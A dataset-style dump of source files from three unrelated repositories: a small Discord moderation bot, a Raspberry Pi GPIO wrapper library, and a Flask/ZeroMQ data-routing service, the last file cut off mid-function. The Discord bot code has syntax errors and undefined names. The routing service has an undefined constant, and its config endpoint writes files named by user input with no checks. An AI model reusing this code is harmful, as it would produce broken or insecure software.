[ { "alpha_fraction": 0.7253521084785461, "alphanum_fraction": 0.7816901206970215, "avg_line_length": 141, "blob_id": "5ccafb07a73101794e6f684edbdb29485f12ffd5", "content_id": "49576f712d8bf6a7b30d2d9adb7ce0fa6cf243a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 142, "license_type": "no_license", "max_line_length": 141, "num_lines": 1, "path": "/README.md", "repo_name": "jbb1999/Doggydiscordbot", "src_encoding": "UTF-8", "text": "This bot was made by Jbb1999#0001. If you find any issues please dm me on discord! Its pretty straight forward, but dm me with any questions!\n" }, { "alpha_fraction": 0.6557759642601013, "alphanum_fraction": 0.6557759642601013, "avg_line_length": 22.542856216430664, "blob_id": "35a57ce0115bb1d8bdec9e2481cee993f8e736d9", "content_id": "d8c68133a90c1baf3f4c93280d2f5b1594ab9fb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 857, "license_type": "no_license", "max_line_length": 86, "num_lines": 35, "path": "/main.py", "repo_name": "jbb1999/Doggydiscordbot", "src_encoding": "UTF-8", "text": "import discord\r\nimport config\r\nfrom discord.ext import commands\r\n\r\n\r\n\r\nbot = commands.Bot(config.command_prefix)\r\n\r\n\r\n\r\n\r\[email protected]\r\nasync def on_ready():\r\n if str(config.playing_true) == 'true':\r\n await bot.change_presence(activity=discord.Game(name=config.playing_name))\r\n\r\n\r\n#user pinged\r\[email protected]\r\nasync def on_message(message):\r\n mention = f'<@!{c}>'\r\n if mention in message.content:\r\n await message.channel.send(\"You are now allowed to mention this user\")\r\n await channel.send(f'{str(ctx.author)} has just pinged person.')\r\n\r\n\r\n#invites\r\nasync def on_message(message):\r\n if message.author != c.user:\r\n if message.contains(\"discord.gg\")\r\n await message.delete()\r\n await message.channel.send('Invites are not allowed')\r\n await 
bot.process_commands(message)\r\n\r\nbot.run(config.token)" }, { "alpha_fraction": 0.7479338645935059, "alphanum_fraction": 0.7479338645935059, "avg_line_length": 79, "blob_id": "dda807f13f9a18076d5852a369f0615366b74627", "content_id": "af0e6706104432ca775c76d6744eb5d93709f4ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 484, "license_type": "no_license", "max_line_length": 159, "num_lines": 6, "path": "/config.py", "repo_name": "jbb1999/Doggydiscordbot", "src_encoding": "UTF-8", "text": "token = \"please enter your oken here\"\r\n\r\ncommand_prefix = input(\"Please enter your desired prefix: \")\r\nplaying_true = input(\"Would you like to have a playing game status? It is case sensetive and will give an error if its not written correctly Say true/false: \")\r\nplaying_name = input(\"What would you like the name of the playing status? Leave this blank if not having one: \")\r\nblacklisted_id = \"\" #this is where you enter the user id of the person you wish to alert when gets pinged." } ]
3
sloft/gpiocrust
https://github.com/sloft/gpiocrust
1c7d07502d4cd8488820257163057736a426c47a
0296f90e511cee6f29e429f00c7f13a58a22af13
09572ea2fb10479f117e3cfecf548018dc69791e
refs/heads/master
2020-02-28T10:04:54.783713
2013-08-15T14:25:11
2013-08-15T14:25:11
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6422699689865112, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 30.433332443237305, "blob_id": "00b7301f5f037d12dea3d4b89e38c35d482dcc55", "content_id": "5c101b4f679394a67d6d31822c6e67f24eb0fd46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3771, "license_type": "permissive", "max_line_length": 321, "num_lines": 120, "path": "/README.md", "repo_name": "sloft/gpiocrust", "src_encoding": "UTF-8", "text": "gpiocrust\n=========\n\nA simple object-oriented wrapper around the Raspberry Pi's [RPi.GPIO](https://pypi.python.org/pypi/RPi.GPIO) library. An encrusting, if you will.\n\n**This is a work in progress.** The goal is a consise, [pythonic](http://stackoverflow.com/a/58992/311207) API for the Raspberry Pi's general purpose I/O pins. I welcome all suggestions, contributions, and half-hearted insults.\n\nUsage\n-----\n\n**Header**\n\nThe `Header` class just wraps the GPIO setup and teardown methods. Most importantly, it ensures that `GPIO.cleanup()` is called. For example:\n\n from gpiocrust import Header\n\n with Header() as header\n # Application logic goes here\n pass\n\n # All cleaned up now.\n \n**OutputPin**\n\nThe `OutputPin` class controls a single GPIO pin for output. You can set its value to `True` (`1`) or `False` (`0`). That's all there is to it!\n\n from gpiocrust import Header, OutputPin\n \n with Header() as header:\n shiny_led = OutputPin(11)\n shiny_led.value = True\n ...\n\n`value` defaults to `False`, but you can set it on instantiation like so:\n\n shiny_led = OutputPin(11, value=True)\n\n**PWMOutputPin**\n\nThe `PWMOutputPin` class controls a single GPIO pin for output, but allows for variable `value`s via software pulse width modulation.\n\n from gpiocrust import Header, PWMOutputPin\n \n with Header() as header:\n soft_led = PWMOutputPin(11)\n soft_led.value = 0.25\n ...\n\nYou can set the frequency (Hz) via the `frequency` property. 
For example:\n\n from gpiocrust import Header, PWMOutputPin\n \n with Header() as header:\n soft_led = PWMOutputPin(11, frequency=100)\n solf_led.frequency = 50\n\n**NOTE:** the RPi.GPIO implementation uses duty cycle values from `0` to `100`. To be consistent with `OutputPin`, `PWMOutputPin` uses decimal values `0.0` to `1.0`.\n\nFor a good overview of how to use the [RPi.GPIO](https://pypi.python.org/pypi/RPi.GPIO) implementation, see [this video](http://youtu.be/uUn0KWwwkq8).\n\n**InputPin**\n\nThe `InputPin` class controls a single GPIO pin for input. You can watch for edge events using a `callback` argument or via the `@change` decorator. For now, `InputPin` only supports watching `GPIO.BOTH` (rising and falling) events.\n\n from gpiocrust import Header, InputPin\n\n def alert_president(value):\n pass\n\n with Header() as header:\n the_red_button = InputPin(11, callback=alert_president)\n\nUsing the `@change` decorator is recommended.\n\n from gpiocrust import Header, InputPin\n\n with Header() as header:\n the_red_button = InputPin(11, value=0)\n\n @the_red_button.change\n def take_action(value):\n pass\n\nMock API\n--------\nMock classes are included that mimick the native GPIO functionality. The library falls back to mock objects when the `RPi.GPIO` package cannot be loaded. 
This allows one to code the general I/O flow of an application in development environments where running code on a physical Raspberry Pi is inconvenient or impossible.\n\nFallback is automatic, so your import statements will look just as before.\n\nOutputPin example\n-----------------\n\n import time\n from gpiocrust import Header, OutputPin, PWMOutputPin\n\n with Header() as header:\n pin11 = OutputPin(11)\n pin15 = PWMOutputPin(15, frequency=100, value=0)\n \n try:\n while 1:\n # Going up\n pin11.value = True\n \n for i in range(100):\n pin15.value = i / 100.0\n time.sleep(0.01)\n \n time.sleep(0.5)\n \n # Going down\n pin11.value = False\n \n for i in range(100):\n pin15.value = (100 - i) / 100.0\n time.sleep(0.01)\n \n time.sleep(0.5)\n except KeyboardInterrupt:\n pass" }, { "alpha_fraction": 0.4563106894493103, "alphanum_fraction": 0.4660194218158722, "avg_line_length": 28.5, "blob_id": "3dc6338821a636362f6e17ae1f61b81e0a0b72f1", "content_id": "800d7318113f26b34c2be70eab4eddfd82cd74d9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "permissive", "max_line_length": 78, "num_lines": 14, "path": "/__init__.py", "repo_name": "sloft/gpiocrust", "src_encoding": "UTF-8", "text": "\"\"\"\nObject oriented wrapper around RPi.GPIO. A work in progress.\n\n(zourtney, August 2013)\n\"\"\"\n\ntry:\n import RPi.GPIO\n from raspberry_pi import *\nexcept:\n print '--------------------------------------------------------------------'\n print ' WARNING: RPi.GPIO library not found. Falling back to mock objects. '\n print '--------------------------------------------------------------------'\n from mock import *" } ]
2
energyjry/n_route
https://github.com/energyjry/n_route
9981e12f82d2983274eeda7797dd55d9c2c93d06
56b7dbdfc5d88366fa5257330dee36c5d7ac44c4
0df50e55d4b77080f1424400920c7871cd48d128
refs/heads/master
2020-08-23T19:26:35.156548
2019-10-22T01:30:02
2019-10-22T01:30:02
216,692,056
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5523960590362549, "alphanum_fraction": 0.5557159185409546, "avg_line_length": 38.58856964111328, "blob_id": "82e91a6d1396533f51bb51a2b403448cf27f952c", "content_id": "25b8318d00fd2047baa3b837e43b60d36a73fcd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7246, "license_type": "no_license", "max_line_length": 119, "num_lines": 175, "path": "/n_route/app/n_route.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: n_route.py\n@time: 2019/09/08\n@desc:\n\"\"\"\nimport json\nfrom flask import Flask\nfrom flask_restplus import Api\nfrom core import Core\nfrom share import CFG_PATH, LOG, Data\nfrom share import sensor2dict\nfrom interface import IVersion, IConfig, IReadTopic, IReadTag, IWriteTag, IFlushData, IState\nfrom interface import REST_VERSION, REST_CONFIG, REST_READ_TOPIC, REST_READ_TAG, REST_FLUSH_DATA, REST_STATE\n\n\nclass Version(IVersion):\n def get_version(self):\n try:\n return True, {'serv_name': basic_info.server_name, 'serv_version': basic_info.server_version,\n 'serv_desc': basic_info.server_desc}\n except Exception as err:\n return False, str(err)\n\n\nclass Config(IConfig):\n def set_config(self, cfg_name, cfg_msg):\n file_name = CFG_PATH + cfg_name + '.json'\n if type(cfg_msg) == dict or type(cfg_msg) == list:\n cfg_msg = json.dumps(cfg_msg, ensure_ascii=False, indent=2)\n try:\n with open(file_name, 'w', encoding='utf-8') as f:\n f.write(cfg_msg)\n ret = '保存配置:%s:%s' % (file_name, cfg_msg)\n LOG.info(ret)\n m_core.set_run_config(file_name, cfg_msg)\n return True, cfg_msg\n except Exception as err:\n ret = '保存配置失败:%s' % (str(err),)\n LOG.error(ret)\n return False, str(err)\n\n def get_config(self, cfg_name):\n file_name = CFG_PATH + cfg_name + '.json'\n try:\n with open(file_name, 'r', encoding='UTF-8') as f:\n cfg_msg = json.loads(f.read())\n return True, cfg_msg\n 
except Exception as err:\n ret = '读取配置失败:%s' % (str(err),)\n LOG.error(ret)\n return False, str(err)\n\n\nclass ReadTopic(IReadTopic):\n def read_topic(self, topic):\n # 目前只支持对下行连续数据的读取\n try:\n if topic == 'all':\n # all主题\n data_list = m_core.m_store_seq_down.get_data_all()\n else:\n # 其它主题(按照tag进行过滤)\n data_list = []\n topic_info = m_core.m_cfg.get_topic_cfg()\n if topic in topic_info:\n index_list = []\n tags = topic_info.tags.split(',')\n for tag in tags:\n index_list.append(m_core.m_store_seq_down.get_index(tag))\n for index in index_list:\n data_list.append(m_core.m_store_seq_down.get_data(index))\n datas = []\n for data in data_list:\n datas.append(sensor2dict(data))\n return True, datas\n except Exception as err:\n return False, str(err)\n\n\nclass ReadTag(IReadTag):\n def read_tags(self, tags):\n # 目前只支持对下行连续数据的读取\n try:\n # 按照tag进行过滤\n data_list, index_list = [], []\n for tag in tags:\n index_list.append(m_core.m_store_seq_down.get_index(tag))\n for index in index_list:\n data = m_core.m_store_seq_down.get_data(index)\n data_list.append(sensor2dict(data))\n return True, data_list\n except Exception as err:\n return False, str(err)\n\n\nclass WriteTag(IWriteTag):\n def write_data(self, tag, value_double, value_int64, value_string, value_bytes, data_type, quality, timestamp):\n # 写入数据(目前只支持写入上行离散数据,即:反写控制)\n try:\n data = Data(tag, data_type, quality, timestamp, value_double=value_double, value_int64=value_int64,\n value_string=value_string, value_bytes=value_bytes.encode())\n m_core.m_store_dis_up.put_data(data)\n return True, '写入数据成功'\n except Exception as err:\n return False, str(err)\n\n\nclass FlushData(IFlushData):\n def flush_data(self):\n # 清空数据区(供运维使用)\n try:\n m_core.m_store_seq_down.clear()\n m_core.m_store_dis_down.clear()\n m_core.m_store_seq_up.clear()\n m_core.m_store_dis_up.clear()\n return True, '清除数据成功'\n except Exception as err:\n return False, str(err)\n\n\nclass State(IState):\n def get_state(self):\n # 获取节点状态\n try:\n node_state = 
{}\n # 节点自身状态\n node_state['run_state'] = 0\n data_state = {}\n # 节点数据区状态(目前只支持下行数据区状态)\n data_state['seq_max'] = m_core.basic_info.sequence_max\n data_state['seq_count'] = m_core.m_store_seq_down.get_data_len()\n data_state['dis_max'] = m_core.basic_info.discrete_max\n data_state['dis_count'] = m_core.m_store_dis_down.get_data_len()\n node_state['data_state'] = data_state\n node_state['driver_state'] = []\n # 驱动状态\n for driver_info in m_core.m_driver_dict.values():\n driver_state = {}\n driver_state['driver_name'] = driver_info.driver_name\n if driver_info.driver:\n ret = json.loads(driver_info.driver.get_state())\n driver_state['driver_state'] = ret['data']\n else:\n driver_state['driver_state'] = -1\n node_state['driver_state'].append(driver_state)\n node_state['topic_state'] = []\n # 主题数据状态\n data_topic_state = m_core.m_topic_data_dict\n for topic_info in data_topic_state.values():\n topic_state = {}\n topic_state['topic'] = topic_info.topic\n topic_state['count'] = topic_info.data_count\n topic_state['time'] = topic_info.last_time\n node_state['topic_state'].append(topic_state)\n return True, node_state\n except Exception as err:\n return False, str(err)\n\nif __name__ == \"__main__\":\n m_core = Core()\n m_core.my_main()\n basic_info = m_core.basic_info\n app = Flask(__name__)\n api = Api(app, version=basic_info.server_version, title=basic_info.server_name, description=basic_info.server_desc)\n api.add_resource(Version, '/' + basic_info.server_name + REST_VERSION)\n api.add_resource(Config, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_CONFIG)\n api.add_resource(ReadTopic, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_READ_TOPIC)\n api.add_resource(ReadTag, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_READ_TAG)\n api.add_resource(WriteTag, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_READ_TAG)\n api.add_resource(FlushData, '/' + basic_info.server_name + '/' + 
basic_info.server_version + REST_FLUSH_DATA)\n api.add_resource(State, '/' + basic_info.server_name + '/' + basic_info.server_version + REST_STATE)\n app.run(host=basic_info.local_ip, port=basic_info.local_port, debug=False)\n" }, { "alpha_fraction": 0.5730693936347961, "alphanum_fraction": 0.5821114182472229, "avg_line_length": 31.22834587097168, "blob_id": "e979dd9f9b1e5be38bfe54dfa58ff36418c84cb5", "content_id": "3860ed4afbc68ac3f3d218f3a1e272e333d75b9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4196, "license_type": "no_license", "max_line_length": 115, "num_lines": 127, "path": "/n_route/app/interface.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!usr/bin/env python\n# -*- coding:utf-8 _*-\n\"\"\"\n@author:jiaruya\n@file: interface.py\n@time: 2019/01/22\n@desc:\n\"\"\"\nfrom flask import request\nfrom flask_restplus import Resource, reqparse\n\nCODE_SUCCESS = 1000\nCODE_PARAM_ERR = 1001\nCODE_CHECK_ERR = 1002\nCODE_OP_FAIL = 1003\n\nREST_VERSION = '/version' # 服务版本\nREST_CONFIG = '/config' # 服务配置\nREST_READ_TOPIC = '/data/topic' # 按照主题读取数据\nREST_READ_TAG = '/data/tag' # 按照测点读取数据\nREST_WRITE_TAG = '/data/tag' # 按照测点写入数据\nREST_FLUSH_DATA = '/data/flush' # 清空数据\nREST_STATE = '/state' # 获取状态\n\n\ndef make_http_ret(ret, msg):\n if ret:\n return {'data': msg, 'code': CODE_SUCCESS, 'msg': '操作成功'}, 200\n else:\n return {'data': msg, 'code': CODE_OP_FAIL, 'msg': '操作失败'}, 400\n\n\nclass IVersion(Resource):\n def get(self):\n ret, msg = self.get_version()\n return make_http_ret(ret, msg)\n\n def get_version(self):\n pass\n\n\nclass IConfig(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('cfg_name', type=str, required=True, location='args')\n args = parser.parse_args()\n ret, msg = self.get_config(args['cfg_name'])\n return make_http_ret(ret, msg)\n\n def post(self):\n req = request.json\n if req is None or 'cfg_name' not in req or 'cfg_msg' 
not in req:\n return {'data': '', 'code': CODE_PARAM_ERR, 'msg': '入参错误'}, REST_FAIL\n cfg_name = req['cfg_name']\n cfg_msg = req['cfg_msg']\n ret, msg = self.set_config(cfg_name, cfg_msg)\n return make_http_ret(ret, msg)\n\n def get_config(self, cfg_name):\n pass\n\n def set_config(self, cfg_name, cfg_msg):\n pass\n\n\nclass IReadTopic(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('topic', type=str, required=True, location='args')\n args = parser.parse_args()\n topic = args['topic']\n ret, msg = self.read_topic(topic)\n return make_http_ret(ret, msg)\n\n def read_topic(self, topic):\n pass\n\n\nclass IReadTag(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('tags', type=str, required=True, location='args')\n args = parser.parse_args()\n tags = args['tags'].split(',')\n ret, msg = self.read_tags(tags)\n return make_http_ret(ret, msg)\n\n def read_tags(self, tags):\n pass\n\n\nclass IWriteTag(Resource):\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('tag', type=str, required=True, location='json')\n parser.add_argument('value_double', type=float, required=True, location='json')\n parser.add_argument('value_int64', type=int, required=True, location='json')\n parser.add_argument('value_string', type=str, required=True, location='json')\n parser.add_argument('value_bytes', type=str, required=True, location='json')\n parser.add_argument('data_type', type=int, required=True, location='json')\n parser.add_argument('quality', type=int, required=True, location='json')\n parser.add_argument('timestamp', type=int, required=True, location='json')\n args = parser.parse_args()\n ret, msg = self.write_data(args['tag'], args['value_double'], args['value_int64'], args['value_string'],\n args['value_bytes'], args['data_type'], args['quality'], args['timestamp'])\n return make_http_ret(ret, msg)\n\n def write_data(self, tag, value_double, value_int64, value_string, value_bytes, 
data_type, quality, timestamp):\n pass\n\n\nclass IFlushData(Resource):\n def get(self):\n ret, msg = self.flush_data()\n return make_http_ret(ret, msg)\n\n def flush_data(self):\n pass\n\n\nclass IState(Resource):\n def get(self):\n ret, msg = self.get_state()\n return make_http_ret(ret, msg)\n\n def get_state(self):\n pass" }, { "alpha_fraction": 0.5035116076469421, "alphanum_fraction": 0.515667200088501, "avg_line_length": 22.88387107849121, "blob_id": "ac4483972277a6016c7a69661e3cd94af6cab39e", "content_id": "72cb2811c92603acf6417290fa0ecb49246b642c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3964, "license_type": "no_license", "max_line_length": 83, "num_lines": 155, "path": "/n_route/app/share.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: share.py\n@time: 2019/08/28\n@desc:\n\"\"\"\nimport json\nimport logging.config\n\nDEBUG = 1\n\n# 配置文件目录\nCFG_PATH = '../conf/'\n\n# 日志配置\nlogging.config.fileConfig(CFG_PATH + 'logger.conf')\nLOG = logging.getLogger('n_route')\n\n\n# -----------------API接口返回值--------------------\nRET_OK = json.dumps({'code': 0, 'data': '执行成功'})\nRET_FAIL_PARAM = json.dumps({'code': 1, 'data': '参数错误'})\nRET_FAIL_EXEC = json.dumps({'code': 2, 'data': '执行失败'})\n\n# -----------------数据模式--------------------\nData_Mode_Dict = {'seq_sensor': 0, 'seq_event': 1, 'dis_sensor': 2, 'dis_event': 3}\n\n# -----------------数据流向--------------------\nData_dir_Dict = {'up': 0, 'down': 1}\n\n# -----------------传感类数据类型--------------------\nData_Type_Dict = {'double': 0, 'int64': 1, 'string': 2, 'bytes': 3}\n\n\n# 传感类数据结构体\nclass Data:\n def __init__(self, tag, data_type, quality, timestamp,\n value_double=0.0,\n value_int64=0,\n value_string='',\n value_bytes=b''):\n # 标签点名称\n self.tag = tag\n # 值\n self.value_double = value_double\n self.value_int64 = value_int64\n self.value_string = 
value_string\n self.value_bytes = value_bytes\n # 数据类型\n self.data_type = data_type\n # 品质\n self.quality = quality\n # 时间戳\n self.timestamp = timestamp\n\n\n# 事件类数据结构体\nclass Event:\n def __init__(self, source, event_type, level, keyword, content, timestamp):\n # 事件源\n self.source = source\n # 事件类型\n self.event_type = event_type\n # 等级\n self.level = level\n # 摘要\n self.keyword = keyword\n # 内容\n self.content = content\n # 时间戳\n self.timestamp = timestamp\n\n\n# 加载python类库\ndef load_python(lib_name):\n try:\n lib = lib_name.split('.')[0]\n driver = __import__(lib)\n if hasattr(driver, 'DataDriver'):\n return driver.DataDriver()\n else:\n return None\n except ImportError as e:\n print(e)\n return None\n\n\n# 加载c#类库\ndef load_csharp(lib_name):\n try:\n import clr\n clr.FindAssembly(lib_name)\n\t\tclr.AddReference(lib_name.split('.')[0])\n from DataDriver import DataDriver\n return DataDriver()\n except Exception as e:\n print(e)\n return None\n\n\n# 读取配置文件\ndef load_config(file_name):\n try:\n file_name = CFG_PATH + file_name\n with open(file_name, 'r', encoding='UTF-8') as f:\n cfg_msg = json.loads(f.read())\n return cfg_msg\n except Exception:\n return {}\n\n\n# 传感类数据对象转字典\ndef sensor2dict(data):\n if data:\n return {'tag': data.tag,\n 'value_double': data.value_double,\n 'value_string': data.value_string,\n 'value_int64': data.value_int64,\n 'value_bytes': data.value_bytes.decode(),\n 'data_type': data.data_type,\n 'quality': data.quality,\n 'timestamp': data.timestamp}\n else:\n return {}\n\n\n# 事件类数据对象转字典\ndef event2dict(event):\n if event:\n return {'source': event.source,\n 'event_type': event.event_type,\n 'level': event.level,\n 'keyword': event.keyword,\n 'content': event.content,\n 'timestamp': event.timestamp}\n else:\n return {}\n\n\n# 检查API执行返回结果\ndef check_api_result(ret):\n try:\n ret_dict = json.loads(ret, encoding='utf-8')\n if ret_dict['code'] == 0:\n return True\n else:\n return False\n except:\n return False\n\n\nif __name__ == \"__main__\":\n 
load_csharp('s_opcda_client.dll')\n" }, { "alpha_fraction": 0.5191552639007568, "alphanum_fraction": 0.5256288051605225, "avg_line_length": 30.938983917236328, "blob_id": "9814a282125fdfebdcc752ab4e7b6819aaf5288b", "content_id": "0da25498733e9e410d0f055a31ef36c1f751b527", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10543, "license_type": "no_license", "max_line_length": 117, "num_lines": 295, "path": "/n_route/app/driver_zmq.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: driver_zmq.py\n@time: 2019/09/01\n@desc:\n\"\"\"\nimport zmq\nimport json\nimport time\nimport logging\nimport threading\nfrom share import Data, Event\nfrom share import RET_OK, RET_FAIL_PARAM, RET_FAIL_EXEC\nimport sensor_list_pb2\nimport event_list_pb2\n\n\n# 日志\nLOG = logging.getLogger('driver_zmq')\n# 驱动版本号\ndriver_version = 'v1.0'\n# 驱动名称\ndriver_name = 'driver_zmq.py'\n# 驱动描述\ndriver_desc = 'zmq驱动程序v1.0版本(20190917)'\n\n\n# zmq初始化环境\ncontext = zmq.Context()\n\n\nclass DataDriver:\n # 订阅配置\n class SubCfg:\n def __init__(self, host, port, topic):\n # 客户端IP地址\n self.host = host\n # 客户端端口号\n self.port = port\n # 客户端订阅主题\n self.topic = topic\n\n def __init__(self):\n # 订阅socket\n self.__sub_socket = context.socket(zmq.SUB)\n # 发布socket\n self.__pub_socket = context.socket(zmq.PUB)\n # 回调函数\n self.__call_back = None\n # 采集线程运行标识\n self.__running = False\n # 本地IP地址\n self.__host = ''\n # 本地端口号\n self.__port = 0\n # 数据模式:sensor(传感类数据);event(事件类数据)\n self.__model = ''\n # 订阅数组\n self.__sub_topics_dict = {}\n # 组装数据函数字典\n self.__package = {'sensor': self.__package_sensor_data, 'event': self.__package_event_data}\n # 解析数据函数字典\n self.__un_package = {'sensor': self.__un_package_sensor_data, 'event': self.__un_package_event_data}\n\n # 获取版本信息\n def get_version(self):\n return json.dumps({'code': 0, 'data': {'version': driver_version, 
'name': driver_name, 'desc': driver_desc}})\n\n # 设置基础配置\n def set_basic_config(self, cfg_name, cfg_msg):\n # 解析配置\n try:\n cfg = json.loads(cfg_msg, encoding='utf-8')\n self.__host = cfg['host']\n self.__port = cfg['port']\n self.__model = cfg['model']\n except Exception as err:\n LOG.error('设置基础配置失败:%s' % (err,))\n return RET_FAIL_PARAM\n # 校验配置\n if self.__model not in self.__package.keys():\n LOG.error('数据模式设置错误:%s' % (self.__model,))\n return RET_FAIL_EXEC\n # 设置基础配置成功\n LOG.info('设置基础配置成功')\n return RET_OK\n\n # 设置运行时配置\n def set_run_config(self, cfg_name, cfg_msg):\n try:\n # 临时变量,保存订阅主题\n cfg_sub_dict = {}\n # 配置所有的订阅信息\n cfg_list = json.loads(cfg_msg, encoding='utf-8')\n for cfg in cfg_list:\n host, port, topic = cfg['host'], cfg['port'], cfg['topic']\n # 组建订阅主题\n sub_key = self.__make_topic(host, port, topic)\n # 添加到临时订阅列表\n cfg_sub_dict[sub_key] = self.SubCfg(host, port, sub_key)\n except Exception as err:\n LOG.error('设置运行配置失败:%s' % (str(err),))\n return RET_FAIL_PARAM\n # 动态更新订阅配置\n if not self.__alter_topic(cfg_sub_dict):\n return RET_FAIL_EXEC\n # 设置运行配置成功\n LOG.info('设置运行配置成功')\n return RET_OK\n\n # 初始化\n def init(self):\n try:\n # 创建zmq服务端\n self.__pub_socket.bind('tcp://%s:%d' % (self.__host, self.__port))\n # 创建订阅线程\n thread_sub = threading.Thread(target=self.__run)\n thread_sub.start()\n LOG.info('创建zmq服务端成功:%s:%d' % (self.__host, self.__port))\n except Exception as err:\n LOG.error('创建zmq服务端失败: %s' % (str(err),))\n return RET_FAIL_EXEC\n # 初始化成功\n LOG.info('驱动初始化成功。创建zmq服务端:%s:%d' % (self.__host, self.__port))\n return RET_OK\n\n # 设置回调函数\n def set_fun(self, fun):\n self.__call_back = fun\n # 设置回调函数成功\n LOG.info('设置回调函数成功')\n return RET_OK\n\n # 写入数据(对外发布数据)\n def write_data(self, data_info, data_list):\n # 解析data_info里的topic\n info = json.loads(data_info, encoding='utf-8')\n # 组建发送标识topic\n topic = self.__make_topic(self.__host, self.__port, info['topic'])\n try:\n # 组装数据\n message = self.__package_data(data_list)\n except Exception as err:\n 
LOG.error('组装数据:%s' % (str(err),))\n return RET_FAIL_EXEC\n try:\n # 发送数据\n self.__pub_socket.send(topic.encode('utf-8') + message)\n except Exception as err:\n LOG.error('发布数据失败:%s' % (str(err),))\n return RET_FAIL_EXEC\n # 写入数据成功\n LOG.debug('%s主题发布%d条数据' % (str(topic), len(data_list)))\n return RET_OK\n\n # 启动运行\n def run(self):\n self.__running = True\n # 启动运行成功\n LOG.info('驱动启动成功')\n return RET_OK\n\n # 停止运行\n def stop(self):\n self.__running = False\n # 停止采集成功\n LOG.info('驱动停止成功')\n return RET_OK\n\n # 获取状态\n def get_state(self):\n if self.__running:\n state = 0x00000000\n else:\n state = 0x00010000\n return json.dumps({'code': 0, 'data': state})\n\n # ------------------------------内部实现--------------------------------\n\n # 组建topic(host:port:topic^)\n def __make_topic(self, host, port, topic):\n result = ':'.join((host, str(port), topic)) + '^'\n return result\n\n # 建立zmq订阅连接,设置订阅主题\n def __connect(self, host, port, topic):\n self.__sub_socket.connect('tcp://%s:%d' % (host, port))\n self.__sub_socket.setsockopt(zmq.SUBSCRIBE, topic.encode())\n\n # 删除订阅主题\n def __dis_connect(self, topic):\n self.__sub_socket.setsockopt(zmq.UNSUBSCRIBE, topic.encode())\n\n # 动态更新主题\n def __alter_topic(self, cfg_sub_dict):\n try:\n for sub_key, sub_info in cfg_sub_dict.items():\n # 检查是否为新增订阅\n if sub_key not in self.__sub_topics_dict:\n # 新增订阅\n self.__connect(sub_info.host, sub_info.port, sub_info.topic)\n # 设置订阅主题\n self.__sub_topics_dict[sub_key] = sub_info\n LOG.info('新增订阅主题:%s' % (sub_info.topic,))\n # 差值计算,查找要删除的订阅\n del_keys = list(set(self.__sub_topics_dict.keys()).difference(set(cfg_sub_dict.keys())))\n for key in del_keys:\n # 退订\n self.__dis_connect(cfg_sub_dict[key].topic)\n # 删除对应主题\n self.__sub_topics_dict.pop(key)\n LOG.info('删除订阅主题:%s' % (cfg_sub_dict[key].topic,))\n return True\n except Exception as err:\n LOG.error('更新主题配置失败: %s' % (str(err),))\n return False\n\n # 主运行函数\n def __run(self):\n while True:\n if self.__running:\n # 接收数据\n message = 
self.__sub_socket.recv()\n topic, message = message.split(b'^')\n # 解析数据\n data_list = self.__parse_data(message)\n # 组装data_info\n data_info = json.dumps({'topic': topic.decode()})\n LOG.debug('接收数据:%s, 长度:%d' % (str(data_info), len(data_list)))\n # 执行回调函数,反馈采集结果\n self.__call_back(data_info, data_list)\n else:\n time.sleep(1)\n\n # 组装数据\n def __package_data(self, data_list):\n return self.__package[self.__model](data_list)\n\n # 解析数据\n def __parse_data(self, message):\n return self.__un_package[self.__model](message)\n\n # 组装传感类数据\n def __package_sensor_data(self, data_list):\n sensor_list = sensor_list_pb2.sensor_list()\n for data in data_list:\n sensor = sensor_list.sensors.add()\n sensor.tag = data.tag\n sensor.value_double = data.value_double\n sensor.value_int64 = data.value_int64\n sensor.value_string = data.value_string\n sensor.value_bytes = data.value_bytes\n sensor.data_type = data.data_type\n sensor.quality = data.quality\n sensor.timestamp = data.timestamp\n return sensor_list.SerializeToString()\n\n # 解析传感类数据\n def __un_package_sensor_data(self, msg_data):\n data_list = []\n sensors_list = sensor_list_pb2.sensor_list()\n sensors_list.ParseFromString(msg_data)\n for sensor in sensors_list.sensors:\n data = Data(sensor.tag, sensor.data_type, sensor.quality, sensor.timestamp,\n value_double=sensor.value_double,\n value_int64=sensor.value_int64,\n value_string=sensor.value_string,\n value_bytes=sensor.value_bytes)\n data_list.append(data)\n return data_list\n\n # 组装事件类数据\n def __package_event_data(self, data_list):\n event_list = event_list_pb2.event_list()\n for data in data_list:\n event = event_list.sensors.add()\n event.source = data.source\n event.event_type = data.event_type\n event.level = data.level\n event.keyword = data.keyword\n event.content = data.content\n event.timestamp = data.timestamp\n return event_list.SerializeToString()\n\n # 解析事件类数据\n def __un_package_event_data(self, msg_data):\n data_list = 